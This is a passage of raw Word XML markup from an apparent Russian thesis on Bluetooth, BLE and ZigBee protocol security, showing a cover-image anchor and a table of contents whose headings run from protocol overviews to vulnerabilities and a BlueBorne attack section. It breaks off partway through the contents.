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BD5" w:rsidRPr="0012765C" w:rsidRDefault="00731F50" w:rsidP="0012765C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:r w:rsidRPr="00731F50">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-80010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6446520" cy="9358273"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="19" name="Рисунок 19" descr="C:\Users\alexk\Deskto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k\Desktop\002.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050" t="5985" r="7781" b="11855"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6447057" cy="93590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A30BD5" w:rsidRPr="0012765C">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A30BD5" w:rsidRPr="000C799E" w:rsidRDefault="00A30BD5" w:rsidP="00C07525">
      <w:pPr>
        <w:pStyle w:val="a0"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc438611718"/>
      <w:bookmarkStart w:id="2" w:name="_Toc438611803"/>
      <w:bookmarkStart w:id="3" w:name="_Toc503990994"/>
      <w:r w:rsidRPr="000C799E">
        <w:lastRenderedPageBreak/>
        <w:t>СОДЕРЖАНИЕ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:id w:val="-621843343"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w:rsidR="0095726D" w:rsidRPr="0095726D" w:rsidRDefault="00A30BD5" w:rsidP="0095726D">
          <w:pPr>
            <w:pStyle w:val="a5"/>
          </w:pPr>
          <w:r w:rsidRPr="000C799E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="000C799E">
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="000C799E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc503990994" w:history="1"/>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503990995" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ВВЕДЕНИЕ</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503990995 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503990996" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1 РАССМОТРЕНИЕ ОБЩЕГО УСТРОЙСТВА ПРОТОКОЛОВ BLUETOOTH™ И ZIGBEE</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503990996 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503990997" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.1 Протокол IEEE 802.15</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503990997 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>11</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503990998" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2 Протокол ZigBee</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503990998 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="0095726D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="a6"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">   </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc503990999" w:history="1">
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.2.1 Типовая структура сети ZigBee</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503990999 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991000" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.3 Bluetooth и BLE</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991000 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="0095726D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="a6"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">   </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc503991001" w:history="1">
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">1.3.1 Обзор стека протокола </w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>B</w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>LE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991001 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991002" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2 БЕЗОПАСНОСТЬ ПРОТОКОЛОВ</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991002 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991003" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.1Обеспечение безопасности в протоколе ZigBee</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991003 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991004" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.2 Обеспечение безопасности в протоколе Bluetooth , BLE</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991004 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991005" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3 УЯЗВИМОСТИ ПРОТОКОЛОВ </w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>BLUETOOTH</w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ZIGBEE</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991005 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991006" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t xml:space="preserve">3.1 Уязвимости </w:t>
            </w:r>
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ZigBee</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991006 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="000004AB">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc503991007" w:history="1">
            <w:r w:rsidR="0095726D" w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 Основные технологии атак протокола Bluetooth и Bluetooth LE</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc503991007 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00731F50">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="0095726D">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="0095726D" w:rsidRDefault="0095726D">
          <w:pPr>
            <w:pStyle w:val="21"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9345"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:cstheme="minorBidi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="a6"/>
              <w:noProof/>
              <w:u w:val="none"/>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">   </w:t>
          </w:r>
          <w:hyperlink w:anchor="_Toc503991009" w:history="1">
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">4.1.1 </w:t>
            </w:r>
            <w:r w:rsidRPr="009731E7">
              <w:rPr>
                <w:rStyle w:val="a6"/>
                <w:noProof/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>BlueBorne</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
